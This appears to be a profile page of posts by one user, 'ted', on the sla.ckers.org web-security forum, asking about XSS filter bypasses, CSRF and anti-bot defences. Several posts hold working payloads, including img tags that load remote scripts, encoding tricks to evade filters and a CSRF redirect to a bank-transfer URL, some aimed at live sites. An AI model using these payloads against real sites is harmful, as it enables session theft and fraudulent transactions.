Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Current Page: 1 of 1
Results 1 - 26 of 26
5 years ago
ted
Hi, all I found a site which use something like UBB to insert an image. However, the < and > was not allowed, yesterday I found the "onerror" could work, but now, it was filtered. I'd tried the another 2 event handlers of the image tag: onabort/onload, but it couldn't work. I am not sure to replace an "onerror" to blank to something else would be safe.
Forum: XSS Info
5 years ago
ted
I want the firefox 3.5 version
Forum: Projects
5 years ago
ted
hxxp://www.devco.net/archives/2008/05/04/designing_a_single_sign_on_system_-_part_3.php However, the author didn't tell us all the detail. I am looking for an open source like that.
Forum: Projects
5 years ago
ted
I had tried cygwin, but failed: $ touch.exe \<img\> touch: cannot touch `<img>': No such file or directory
Forum: XSS Info
5 years ago
ted
Hi, all I had read RSnake's book, and I know I can create a share in Windows 2000 that contained the characters <>. I had tried to export:HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares, but my file is : Windows Registry Editor Version 5.00 And I don't know how to change a file just like foo.txt to <img>.rar Thanks in advance.
Forum: XSS Info
5 years ago
ted
.mario Wrote: ------------------------------------------------------- > That only works on IE - this way it works on most > other browsers too: > > <img src="x" onerror="with(document)body.previousSibling.appendChild(createElement('script')).src='//&#331;.ws'"> > > > > String.fromCharCode enables having all the fun > even witho
Forum: XSS Info
5 years ago
ted
I got it <img src=javascript:document.write('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://www.a.com/m_2.js%22%3E%3C%2F%73%63%72%69%70%74%3E')>
Forum: XSS Info
5 years ago
ted
I found the <img src=javascript:alert(/xss/)> works well, but I can't find a way to make a remote js work in it, I've tried: <img src="javascript:src='1.js'"> but failed. Thanks in advance.
Forum: XSS Info
5 years ago
ted
We got a flash game project from a third-party company, and we had the source code of the actionscript3.0. Once we compile it and make it work, our users would play the game in their browser. I am afraid that the flash will send our users' information to their third-party server in the mean while it contract with our server. Maybe it would send the user's information via TCP/UDP, so Firebug can
Forum: CSRF and Session Info
5 years ago
ted
Is there strategics to make the actionscript 3.0 not easy to understand by human even if the crackers decomplied it my some tools like sothink? Thanks in advance.
Forum: OMG Ponies
5 years ago
ted
Ok, you know that simulating the user who playing the web game is an easy job. The robots just need to send some http request, for example: hxxp://web-game.com/api/add.php?arm=1&army=other I've thought about add a key in the request, and the key will be generated by the actionscript, but once the crackers decomplied the swf file, they will know how the key was generated.
Forum: OMG Ponies
5 years ago
ted
Hi all, there are so many web game robots, acutually such these robots will not only add the payload of our web server but also inrease the bandwith. Yes I know and familiar with those QA tools, and maybe that's not the place for such topic. But I really want to to deal with the game robots, thus we can 'kill' Robot... So I need some help...
Forum: OMG Ponies
5 years ago
ted
I found firefox's Tamper Data addon can just tamper the POST data,but can not tamper the GET data, and I just want to tamper the GET data, I can't paste the changed url in the browser because it's a request from flash. Any way else?
Forum: XSS Info
5 years ago
ted
Kyo Wrote: ------------------------------------------------------- > use a slash instead of the space thanks a lot! :)
Forum: XSS Info
5 years ago
ted
Hi, all. I found a xss vulnerabilty in a sns web site. When I typed <u>a</u> in the message box, I echod a letter 'a' with an under-line. However, when I typed: <img src="javascript:alert('xss');"> I echos: <img&nbsp;src="j**ascript:alert('xss');"> Well, the word "av" was a senitive word in this site. So I use ja&#x09;vasc
Forum: XSS Info
6 years ago
ted
I found this string could make the page show nothing: <!-- :P
Forum: XSS Info
6 years ago
ted
Hi,all. I found a site which may have a persistent XSS vulnerability, but I can't find a way to do it. I type this string in the board: <u>xss''"!--</u> The source of the page was: <SCRIPT LANGUAGE="JavaScript"> ... var base=...:{"enable":1,"content":"<u>xss\'\'\"!--<\/u>"},... ... </SCRIPT>
Forum: XSS Info
6 years ago
ted
The firefox plugin tamperdata is wonderful, I am wondering if there is the same software for ie?
Forum: XSS Info
6 years ago
ted
I knew this from: hxxp://www.infoworld.com/article/08/08/01/A_photo_that_can_steal_your_online_credentials_1.html Any one know the detail about this? I want to know how can I improve my web applications to continually to check and filter these hybrid files. Best regards.
Forum: CSRF and Session Info
6 years ago
ted
Thanks Awesome, it works!
Forum: CSRF and Session Info
6 years ago
ted
Thanks so much, I found that many websites couldn't realize the CSRF attack in this way, and use the GET method to request the data. But in some cases, they set the user id as one of the parameter, such as Quote Redirect 302 /a.jpg http://www.somebank.com/transferfuns.php?user_id_from=1231&user_id_to=2221&count=1000000000000 That means one picture can only attack one person,I am think
Forum: CSRF and Session Info
6 years ago
ted
I was trying to construct XSS attack in this page, since I couldn't find any filtration on user-supplied data. However, I want to know that if anyone could insert malicious code into that page.
Forum: XSS Info
6 years ago
ted
I have seen that many web sites have options that allow users to enter data and then receive an updated dynamic display created according to their input, and I found some of them is susceptible to a XSS attack. In most case, we should ends the original tag before we can construct a url that has exploit code,such as this: Quote http://www.somesite.com/search.php?key=</td></tr><sc
Forum: XSS Info
6 years ago
ted
I found an interesting function in a forum like this: Quote String.prototype.escHtml = function() { return this.replace(/[&'"<>\/\\\-\x00-\x09\x0b-\x0c\x1f\x80-\xff]/g, function(r){ return "&#"+r.charCodeAt(0)+";" })\ .replace(/\r\n/g, "<BR>").\ replace(/\n/g, "<BR>"). \ replace(/\r/g, "<BR
Forum: XSS Info
6 years ago
ted
Hi,all I've been trying CSRF for a while now, and am surprised at just how many sites are vulnerable. In the "Cross Site Scripting Attacks: XSS Exploits and Defense", page 111 tells: Quote " ...... This is an example Apache redirection in the httpd.conf or .htaccess file: Redirect 302 /a.jpg https://somebank.com/transferfunds.asp?amnt=1000000&acct=123456 ...... "
Forum: CSRF and Session Info
6 years ago
ted
If the site echoes back user supplied input into a <script> and </script>, I think I will try to use String.fromCharCode(60) and String.fromCharCode(62) to get around it. But if the it just echoes back into a Quote <marquee scrollamount='1' scrolldelay='120' direction= 'UP' height='155'> <font color=""> ...... some content with &lt; and &am
Forum: XSS Info
Current Page: 1 of 1